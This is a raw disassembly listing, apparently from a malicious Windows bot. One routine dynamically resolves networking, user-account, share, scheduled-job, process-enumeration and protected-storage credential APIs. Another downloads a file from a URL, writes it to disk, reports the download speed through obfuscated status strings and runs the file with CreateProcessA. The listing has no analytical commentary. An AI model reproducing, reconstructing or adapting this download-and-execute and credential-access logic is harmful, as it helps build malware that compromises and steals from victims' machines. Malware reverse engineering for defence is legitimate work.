cmp dword_456DAC, ebx
jz short loc_4179EA
cmp eax, ebx
jnz short loc_4179F4
jmp short loc_4179EA
; ---------------------------------------------------------------------------
loc_4179DF: ; CODE XREF: sub_417362+5BC�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457044, eax
loc_4179EA: ; CODE XREF: sub_417362+63D�j
; sub_417362+645�j ...
mov dword_457040, 1
loc_4179F4: ; CODE XREF: sub_417362+679�j
mov ebp, dword_437034
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417CC1
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; dword_437030
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_456E78, eax
call esi ; dword_437030
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_456FFC, eax
call esi ; dword_437030
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_456E08, eax
call esi ; dword_437030
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_456DD8, eax
call esi ; dword_437030
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_456EC0, eax
call esi ; dword_437030
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_456EA4, eax
call esi ; dword_437030
push offset aSocket ; "socket"
push edi
mov dword_456E58, eax
call esi ; dword_437030
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_456FD0, eax
call esi ; dword_437030
push offset aConnect ; "connect"
push edi
mov dword_456FF4, eax
call esi ; dword_437030
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_456EBC, eax
call esi ; dword_437030
push offset aInet_addr ; "inet_addr"
push edi
mov dword_456FDC, eax
call esi ; dword_437030
push offset aHtons ; "htons"
push edi
mov dword_456F7C, eax
call esi ; dword_437030
push offset aHtonl ; "htonl"
push edi
mov dword_456F38, eax
call esi ; dword_437030
push offset aNtohs ; "ntohs"
push edi
mov dword_456F34, eax
call esi ; dword_437030
push offset aNtohl ; "ntohl"
push edi
mov dword_456E30, eax
call esi ; dword_437030
push offset aSend ; "send"
push edi
mov dword_456E28, eax
call esi ; dword_437030
push offset aSendto ; "sendto"
push edi
mov dword_456F8C, eax
call esi ; dword_437030
push offset aRecv ; "recv"
push edi
mov dword_456FAC, eax
call esi ; dword_437030
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_456F58, eax
call esi ; dword_437030
mov dword_456F04, eax
push offset aBind ; "bind"
push edi
call esi ; dword_437030
push offset aSelect ; "select"
push edi
mov dword_456F6C, eax
call esi ; dword_437030
push offset aListen ; "listen"
push edi
mov dword_456F1C, eax
call esi ; dword_437030
push offset aAccept ; "accept"
push edi
mov dword_456F68, eax
call esi ; dword_437030
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_456FE4, eax
call esi ; dword_437030
push offset aGetsockname ; "getsockname"
push edi
mov dword_456F10, eax
call esi ; dword_437030
push offset aGethostname ; "gethostname"
push edi
mov dword_456EB8, eax
call esi ; dword_437030
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_456F4C, eax
call esi ; dword_437030
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_456FD4, eax
call esi ; dword_437030
push offset aGetpeername ; "getpeername"
push edi
mov dword_456ED8, eax
call esi ; dword_437030
push offset aClosesocket ; "closesocket"
push edi
mov dword_456E54, eax
call esi ; dword_437030
push offset aShutdown ; "shutdown"
push edi
mov dword_456FF0, eax
call esi ; dword_437030
cmp dword_456E78, ebx
mov dword_456FE8, eax
jz loc_417CCC
cmp dword_456FFC, ebx
jz loc_417CCC
cmp dword_456E08, ebx
jz loc_417CCC
cmp dword_456EC0, ebx
jz loc_417CCC
cmp dword_456EA4, ebx
jz loc_417CCC
cmp dword_456E58, ebx
jz loc_417CCC
cmp dword_456FD0, ebx
jz loc_417CCC
cmp dword_456FF4, ebx
jz loc_417CCC
cmp dword_456EBC, ebx
jz loc_417CCC
cmp dword_456FDC, ebx
jz loc_417CCC
cmp dword_456F7C, ebx
jz loc_417CCC
cmp dword_456F38, ebx
jz loc_417CCC
cmp dword_456F34, ebx
jz loc_417CCC
cmp dword_456E30, ebx
jz short loc_417CCC
cmp dword_456F8C, ebx
jz short loc_417CCC
cmp dword_456FAC, ebx
jz short loc_417CCC
cmp dword_456F58, ebx
jz short loc_417CCC
cmp dword_456F04, ebx
jz short loc_417CCC
cmp dword_456F6C, ebx
jz short loc_417CCC
cmp dword_456F1C, ebx
jz short loc_417CCC
cmp dword_456F68, ebx
jz short loc_417CCC
cmp dword_456FE4, ebx
jz short loc_417CCC
cmp dword_456F10, ebx
jz short loc_417CCC
cmp dword_456EB8, ebx
jz short loc_417CCC
cmp dword_456F4C, ebx
jz short loc_417CCC
cmp dword_456FD4, ebx
jz short loc_417CCC
cmp dword_456ED8, ebx
jz short loc_417CCC
cmp dword_456FF0, ebx
jnz short loc_417CD6
jmp short loc_417CCC
; ---------------------------------------------------------------------------
loc_417CC1: ; CODE XREF: sub_417362+6A3�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_45704C, eax
loc_417CCC: ; CODE XREF: sub_417362+84F�j
; sub_417362+85B�j ...
mov dword_457048, 1
loc_417CD6: ; CODE XREF: sub_417362+95B�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417DF5
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; dword_437030
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_456E38, eax
call esi ; dword_437030
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_456DB4, eax
call esi ; dword_437030
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_456EF0, eax
call esi ; dword_437030
push offset aFtpgetfilea ; "FtpGetFileA"
push edi
mov dword_456E7C, eax
call esi ; dword_437030
push offset aFtpputfilea ; "FtpPutFileA"
push edi
mov dword_456E18, eax
call esi ; dword_437030
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_456FBC, eax
call esi ; dword_437030
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_456F00, eax
call esi ; dword_437030
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_456EA8, eax
call esi ; dword_437030
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_456DF4, eax
call esi ; dword_437030
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_456DE8, eax
call esi ; dword_437030
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_456DFC, eax
call esi ; dword_437030
cmp dword_456E38, ebx
mov ecx, dword_456EA8
mov dword_456F70, eax
jz short loc_417DD1
cmp dword_456DB4, ebx
jz short loc_417DD1
cmp dword_456EF0, ebx
jz short loc_417DD1
cmp dword_456E7C, ebx
jz short loc_417DD1
cmp dword_456F00, ebx
jz short loc_417DD1
cmp ecx, ebx
jz short loc_417DD1
cmp dword_456DF4, ebx
jz short loc_417DD1
cmp dword_456DE8, ebx
jz short loc_417DD1
cmp dword_456DFC, ebx
jz short loc_417DD1
cmp eax, ebx
jnz short loc_417DDB
loc_417DD1: ; CODE XREF: sub_417362+A2D�j
; sub_417362+A35�j ...
mov dword_457050, 1
loc_417DDB: ; CODE XREF: sub_417362+A6D�j
cmp ecx, ebx
jz short loc_417E10
push ebx
push ebx
push ebx
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
call ecx ; dword_456EA8
cmp eax, ebx
mov dword_456ED0, eax
jnz short loc_417E10
jmp short loc_417E0A
; ---------------------------------------------------------------------------
loc_417DF5: ; CODE XREF: sub_417362+97F�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457054, eax
mov dword_457050, 1
loc_417E0A: ; CODE XREF: sub_417362+A91�j
mov dword_456ED0, ebx
loc_417E10: ; CODE XREF: sub_417362+A7B�j
; sub_417362+A8F�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_417E5A
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; dword_437030
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_456E94, eax
call esi ; dword_437030
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_457018, eax
call esi ; dword_437030
cmp dword_456E94, ebx
mov dword_456E10, eax
jz short loc_417E65
cmp dword_457018, ebx
jz short loc_417E65
cmp eax, ebx
jnz short loc_417E6F
jmp short loc_417E65
; ---------------------------------------------------------------------------
loc_417E5A: ; CODE XREF: sub_417362+AB9�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_45705C, eax
loc_417E65: ; CODE XREF: sub_417362+AE8�j
; sub_417362+AF0�j ...
mov dword_457058, 1
loc_417E6F: ; CODE XREF: sub_417362+AF4�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_417F65
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; dword_437030
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_456DE0, eax
call esi ; dword_437030
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_456DBC, eax
call esi ; dword_437030
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_456E40, eax
call esi ; dword_437030
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_456E84, eax
call esi ; dword_437030
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_456FE0, eax
call esi ; dword_437030
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_456E2C, eax
call esi ; dword_437030
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_456DC4, eax
call esi ; dword_437030
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_456DB8, eax
call esi ; dword_437030
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_456E60, eax
call esi ; dword_437030
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_456F98, eax
call esi ; dword_437030
cmp dword_456DE0, ebx
mov dword_456F48, eax
jz short loc_417F70
cmp dword_456DBC, ebx
jz short loc_417F70
cmp dword_456E40, ebx
jz short loc_417F70
cmp dword_456E84, ebx
jz short loc_417F70
cmp dword_456FE0, ebx
jz short loc_417F70
cmp dword_456E2C, ebx
jz short loc_417F70
cmp dword_456DC4, ebx
jz short loc_417F70
cmp dword_456DB8, ebx
jz short loc_417F70
cmp dword_456E60, ebx
jz short loc_417F70
cmp dword_456F98, ebx
jz short loc_417F70
cmp eax, ebx
jnz short loc_417F7A
jmp short loc_417F70
; ---------------------------------------------------------------------------
loc_417F65: ; CODE XREF: sub_417362+B18�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457064, eax
loc_417F70: ; CODE XREF: sub_417362+BB3�j
; sub_417362+BBB�j ...
mov dword_457060, 1
loc_417F7A: ; CODE XREF: sub_417362+BFF�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_417FAF
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; dword_437030
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_456E14, eax
call esi ; dword_437030
cmp dword_456E14, ebx
mov dword_456F2C, eax
jz short loc_417FBA
cmp eax, ebx
jnz short loc_417FC4
jmp short loc_417FBA
; ---------------------------------------------------------------------------
loc_417FAF: ; CODE XREF: sub_417362+C23�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_45706C, eax
loc_417FBA: ; CODE XREF: sub_417362+C45�j
; sub_417362+C4B�j
mov dword_457068, 1
loc_417FC4: ; CODE XREF: sub_417362+C49�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz loc_418057
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; dword_437030
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_456FCC, eax
call esi ; dword_437030
push offset aGetiftable ; "GetIfTable"
push edi
mov dword_456FC8, eax
call esi ; dword_437030
push offset aGettcptable ; "GetTcpTable"
push edi
mov dword_456EFC, eax
call esi ; dword_437030
push offset aGetudptable ; "GetUdpTable"
push edi
mov dword_456F14, eax
call esi ; dword_437030
cmp dword_456FCC, ebx
mov dword_456FA4, eax
jz short loc_41803A
cmp dword_456FC8, ebx
jz short loc_41803A
cmp dword_456EFC, ebx
jz short loc_41803A
cmp eax, ebx
jz short loc_41803A
cmp dword_456F14, ebx
jnz short loc_418044
loc_41803A: ; CODE XREF: sub_417362+CBA�j
; sub_417362+CC2�j ...
mov dword_457070, 1
loc_418044: ; CODE XREF: sub_417362+CD6�j
push offset aGetnetworkpara ; "GetNetworkParams"
push edi
call esi ; dword_437030
cmp eax, ebx
mov dword_456EB4, eax
jnz short loc_41806C
jmp short loc_418062
; ---------------------------------------------------------------------------
loc_418057: ; CODE XREF: sub_417362+C6D�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457078, eax
loc_418062: ; CODE XREF: sub_417362+CF3�j
mov dword_457070, 1
loc_41806C: ; CODE XREF: sub_417362+CF1�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_4180CB
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; dword_437030
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_457000, eax
call esi ; dword_437030
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_456FF8, eax
call esi ; dword_437030
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_456FB0, eax
call esi ; dword_437030
cmp dword_457000, ebx
mov dword_456E34, eax
jz short loc_4180D6
cmp dword_456FF8, ebx
jz short loc_4180D6
cmp dword_456FB0, ebx
jz short loc_4180D6
cmp eax, ebx
jnz short loc_4180E0
jmp short loc_4180D6
; ---------------------------------------------------------------------------
loc_4180CB: ; CODE XREF: sub_417362+D15�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457080, eax
loc_4180D6: ; CODE XREF: sub_417362+D51�j
; sub_417362+D59�j ...
mov dword_45707C, 1
loc_4180E0: ; CODE XREF: sub_417362+D65�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_418115
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; dword_437030
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_456E74, eax
call esi ; dword_437030
cmp dword_456E74, ebx
mov dword_456FC4, eax
jz short loc_418120
cmp eax, ebx
jnz short loc_41812A
jmp short loc_418120
; ---------------------------------------------------------------------------
loc_418115: ; CODE XREF: sub_417362+D89�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457088, eax
loc_418120: ; CODE XREF: sub_417362+DAB�j
; sub_417362+DB1�j
mov dword_457084, 1
loc_41812A: ; CODE XREF: sub_417362+DAF�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_4181B3
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; dword_437030
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_456F78, eax
call esi ; dword_437030
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_456FD8, eax
call esi ; dword_437030
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_456EE8, eax
call esi ; dword_437030
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_456E8C, eax
call esi ; dword_437030
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_456F5C, eax
call esi ; dword_437030
cmp dword_456F78, ebx
mov dword_456E9C, eax
jz short loc_4181BE
cmp dword_456FD8, ebx
jz short loc_4181BE
cmp dword_456EE8, ebx
jz short loc_4181BE
cmp dword_456E8C, ebx
jz short loc_4181BE
cmp dword_456F5C, ebx
jz short loc_4181BE
cmp eax, ebx
jnz short loc_4181C8
jmp short loc_4181BE
; ---------------------------------------------------------------------------
loc_4181B3: ; CODE XREF: sub_417362+DD3�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_457090, eax
loc_4181BE: ; CODE XREF: sub_417362+E29�j
; sub_417362+E31�j ...
mov dword_45708C, 1
loc_4181C8: ; CODE XREF: sub_417362+E4D�j
push offset aPsapi_dll ; "psapi.dll"
call ebp ; dword_437034
mov edi, eax
cmp edi, ebx
jz short loc_41823D
push offset aGetmodulefilen ; "GetModuleFileNameExA"
push edi
call esi ; dword_437030
push offset aGetmodulebasen ; "GetModuleBaseNameA"
push edi
mov dword_456EE4, eax
call esi ; dword_437030
push offset aEnumprocessmod ; "EnumProcessModules"
push edi
mov dword_456E20, eax
call esi ; dword_437030
push offset aEnumprocesses ; "EnumProcesses"
push edi
mov dword_456EEC, eax
call esi ; dword_437030
push offset aGetprocessmemo ; "GetProcessMemoryInfo"
push edi
mov dword_456F30, eax
call esi ; dword_437030
cmp dword_456E20, ebx
mov dword_456FA0, eax
jz short loc_418232
cmp dword_456EEC, ebx
jz short loc_418232
cmp dword_456F30, ebx
jz short loc_418232
cmp eax, ebx
jnz short loc_418252
loc_418232: ; CODE XREF: sub_417362+EBA�j
; sub_417362+EC2�j ...
xor edi, edi
inc edi
mov dword_45709C, edi
jmp short loc_418255
; ---------------------------------------------------------------------------
loc_41823D: ; CODE XREF: sub_417362+E71�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_4570A0, eax
mov dword_45709C, 1
loc_418252: ; CODE XREF: sub_417362+ECE�j
xor edi, edi
inc edi
loc_418255: ; CODE XREF: sub_417362+ED9�j
push offset aPstorec_dll ; "pstorec.dll"
call ebp ; dword_437034
cmp eax, ebx
jz short loc_418273
push offset aPstorecreatein ; "PStoreCreateInstance"
push eax
call esi ; dword_437030
cmp eax, ebx
mov dword_456F0C, eax
jnz short loc_418284
jmp short loc_41827E
; ---------------------------------------------------------------------------
loc_418273: ; CODE XREF: sub_417362+EFC�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_4570A8, eax
loc_41827E: ; CODE XREF: sub_417362+F0F�j
mov dword_4570A4, edi
loc_418284: ; CODE XREF: sub_417362+F0D�j
push offset aShlwapi_dll ; "shlwapi.dll"
call ebp ; dword_437034
cmp eax, ebx
jz short loc_4182A2
push offset aPathremovefile ; "PathRemoveFileSpecA"
push eax
call esi ; dword_437030
cmp eax, ebx
mov dword_456EAC, eax
jnz short loc_4182B3
jmp short loc_4182AD
; ---------------------------------------------------------------------------
loc_4182A2: ; CODE XREF: sub_417362+F2B�j
call dword_437170 ; RtlGetLastWin32Error
mov dword_4570B8, eax
loc_4182AD: ; CODE XREF: sub_417362+F3E�j
mov dword_4570B4, edi
loc_4182B3: ; CODE XREF: sub_417362+F3C�j
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_417362 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182BA proc near ; DATA XREF: sub_40A9FE+56AF�o
; sub_40A9FE+5942�o
var_2BE4 = byte ptr -2BE4h
var_4D4 = byte ptr -4D4h
var_3D0 = byte ptr -3D0h
var_330 = byte ptr -330h
var_2B8 = byte ptr -2B8h
var_240 = byte ptr -240h
var_13C = dword ptr -13Ch
var_110 = dword ptr -110h
var_10C = word ptr -10Ch
var_F8 = byte ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = byte ptr -0F0h
var_88 = qword ptr -88h
var_7C = qword ptr -7Ch
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = qword ptr -20h
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2BE4h
call sub_429B60
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_F4]
rep movsd
xor edi, edi
push 9Fh
push [ebp+var_6C]
inc edi
mov [eax+0BCh], edi
mov eax, [ebp+var_F4]
mov [ebp+arg_0], eax
lea eax, [ebp+var_3D0]
push eax
call sub_429D10
push 104h
lea eax, [ebp+var_240]
push [ebp+var_68]
push eax
call sub_429D10
add esp, 18h
xor ebx, ebx
lea eax, [ebp+var_3D0]
push ebx
push 80000300h
push ebx
push ebx
push eax
push dword_456ED0
call dword_456DF4 ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_2C], eax
jz loc_4189B5
push ebx
push ebx
push 2
push ebx
push ebx
lea eax, [ebp+var_240]
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, edi
mov dword ptr [ebp+var_20+4], eax
jnb short loc_4183DC
cmp [ebp+var_40], ebx
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
mov esi, offset aSCouldnTOpenFi ; "%s Couldn't open file for writing: %s."
jnz short loc_418399
cmp [ebp+var_3C], ebx
jnz short loc_41839E
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_41837E
mov eax, edi
loc_41837E: ; CODE XREF: sub_4182BA+C0�j
lea ecx, [ebp+var_240]
push ecx
push eax
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 14h
loc_418399: ; CODE XREF: sub_4182BA+B1�j
cmp [ebp+var_3C], ebx
jz short loc_4183C3
loc_41839E: ; CODE XREF: sub_4182BA+B6�j
cmp [ebp+var_60], ebx
jz short loc_4183A8
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
loc_4183A8: ; CODE XREF: sub_4182BA+E7�j
lea eax, [ebp+var_240]
push eax
push edi
lea eax, [ebp+var_F0]
push esi
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 14h
loc_4183C3: ; CODE XREF: sub_4182BA+E2�j
push [ebp+var_2C]
call dword_456F70 ; InternetCloseHandle
push [ebp+var_70]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_4183DC: ; CODE XREF: sub_4182BA+A2�j
mov esi, dword_437188
mov [ebp+var_4], ebx
call esi ; dword_437188
mov edi, 7D000h
mov dword ptr [ebp+var_C+4], eax
push edi
call sub_4297B8
pop ecx
mov [ebp+var_30], eax
loc_4183F9: ; CODE XREF: sub_4182BA+1B9�j
push 2710h
lea eax, [ebp+var_2BE4]
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_2BE4]
push 2710h
push eax
push [ebp+var_2C]
call dword_456DFC ; InternetReadFile
lea eax, [ebp+var_F8]
push ebx
push eax
lea eax, [ebp+var_2BE4]
push [ebp+var_18]
push eax
push dword ptr [ebp+var_20+4]
call dword_437078 ; WriteFile
mov ecx, [ebp+var_4]
cmp ecx, edi
jnb short loc_41846B
mov eax, edi
sub eax, ecx
cmp eax, [ebp+var_18]
jbe short loc_418455
mov eax, [ebp+var_18]
loc_418455: ; CODE XREF: sub_4182BA+196�j
push eax
lea eax, [ebp+var_2BE4]
push eax
mov eax, [ebp+var_30]
add eax, ecx
push eax
call sub_429420
add esp, 0Ch
loc_41846B: ; CODE XREF: sub_4182BA+18D�j
mov eax, [ebp+var_18]
add [ebp+var_4], eax
cmp eax, ebx
ja short loc_4183F9
call esi ; dword_437188
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_30]
div ecx
xor edx, edx
mov ecx, eax
mov eax, [ebp+var_4]
inc ecx
div ecx
mov dword ptr [ebp+var_C+4], eax
call sub_4298F2
pop ecx
push dword ptr [ebp+var_20+4]
call dword_437044 ; CloseHandle
push [ebp+var_2C]
call dword_456F70 ; InternetCloseHandle
cmp [ebp+var_40], ebx
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jnz short loc_41851D
cmp [ebp+var_3C], ebx
jnz short loc_418522
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_4184C6
mov eax, edi
loc_4184C6: ; CODE XREF: sub_4182BA+208�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_20+4], ebx
mov dword ptr [ebp+var_20], ecx
push ecx
fild [ebp+var_20]
push ecx
lea ecx, [ebp+var_240]
mov dword ptr [ebp+var_20+4], ebx
fmul dbl_437328
fstp [esp+7Ch+var_7C]
push ecx
mov ecx, [ebp+var_4]
mov dword ptr [ebp+var_20], ecx
push ecx
fild [ebp+var_20]
push ecx
fmul dbl_437328
fstp [esp+88h+var_88]
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push eax
lea eax, [ebp+var_F0]
push offset aSSS_1fkbToS@_1 ; "%s %s %s: %.1fKB to: %s @ %.1fKB/sec."
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 2Ch
loc_41851D: ; CODE XREF: sub_4182BA+1F9�j
cmp [ebp+var_3C], ebx
jz short loc_418585
loc_418522: ; CODE XREF: sub_4182BA+1FE�j
cmp [ebp+var_60], ebx
mov eax, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jnz short loc_41852E
mov eax, edi
loc_41852E: ; CODE XREF: sub_4182BA+270�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_C+4], ebx
mov dword ptr [ebp+var_C], ecx
push ecx
fild [ebp+var_C]
push ecx
lea ecx, [ebp+var_240]
mov dword ptr [ebp+var_C+4], ebx
fmul dbl_437328
fstp [esp+7Ch+var_7C]
push ecx
mov ecx, [ebp+var_4]
mov dword ptr [ebp+var_C], ecx
push ecx
fild [ebp+var_C]
push ecx
fmul dbl_437328
fstp [esp+88h+var_88]
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push eax
lea eax, [ebp+var_F0]
push offset aSSS_1fkbToS@_1 ; "%s %s %s: %.1fKB to: %s @ %.1fKB/sec."
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 2Ch
loc_418585: ; CODE XREF: sub_4182BA+266�j
cmp [ebp+var_60], ebx
jnz loc_4188A1
cmp [ebp+var_5C], ebx
jz loc_418A2A
mov eax, [ebp+var_58]
push 104h
mov dword ptr [ebp+var_C+4], eax
lea eax, [ebp+var_240]
push eax
lea eax, [ebp+var_4D4]
push eax
call sub_429D10
add esp, 0Ch
lea eax, [ebp+var_4D4]
push eax
call dword_456EAC ; PathRemoveFileSpecA
test eax, eax
jnz short loc_418626
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
jnz short loc_4185F8
cmp [ebp+var_3C], ebx
jnz short loc_418601
call dword_437170 ; RtlGetLastWin32Error
push eax
push esi
push edi
lea eax, [ebp+var_F0]
push offset aSCouldnTParseP ; "%s Couldn't parse path, %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 18h
loc_4185F8: ; CODE XREF: sub_4182BA+317�j
cmp [ebp+var_3C], ebx
jz loc_418700
loc_418601: ; CODE XREF: sub_4182BA+31C�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push esi
push edi
lea eax, [ebp+var_F0]
push offset aSCouldnTParseP ; "%s Couldn't parse path, %s: <%d>"
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 18h
jmp loc_418700
; ---------------------------------------------------------------------------
loc_418626: ; CODE XREF: sub_4182BA+30D�j
push 44h
lea eax, [ebp+var_13C]
push ebx
push eax
call sub_429760
push 10h
lea eax, [ebp+var_28]
push ebx
push eax
call sub_429760
mov eax, dword ptr [ebp+var_C+4]
add esp, 18h
neg eax
sbb eax, eax
mov [ebp+var_13C], 44h
and al, 0FBh
mov [ebp+var_110], 1
add eax, 5
mov [ebp+var_10C], ax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_4D4]
push eax
push ebx
push ebx
push ebx
push ebx
lea eax, [ebp+var_240]
push ebx
push eax
push ebx
call dword_4370D8 ; CreateProcessA
test eax, eax
jnz short loc_41870A
cmp [ebp+var_40], ebx
mov esi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
jnz short loc_4186CF
cmp [ebp+var_3C], ebx
jnz short loc_4186D4
call dword_437170 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_240]
push esi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push edi
lea eax, [ebp+var_F0]
push offset aSSToCreateProc ; "%s %s to create process: \"%s\", %s: <%d>"...
push eax
push [ebp+arg_0]
call sub_41CE4A
add esp, 20h
loc_4186CF: ; CODE XREF: sub_4182BA+3E2�j
cmp [ebp+var_3C], ebx
jz short loc_418700
loc_4186D4: ; CODE XREF: sub_4182BA+3E7�j
call dword_437170 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_240]
push esi
push eax
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push edi
lea eax, [ebp+var_F0]
push offset aSSToCreateProc ; "%s %s to create process: \"%s\", %s: <%d>"...
push eax
push [ebp+arg_0]
call sub_41CDD4
add esp, 20h
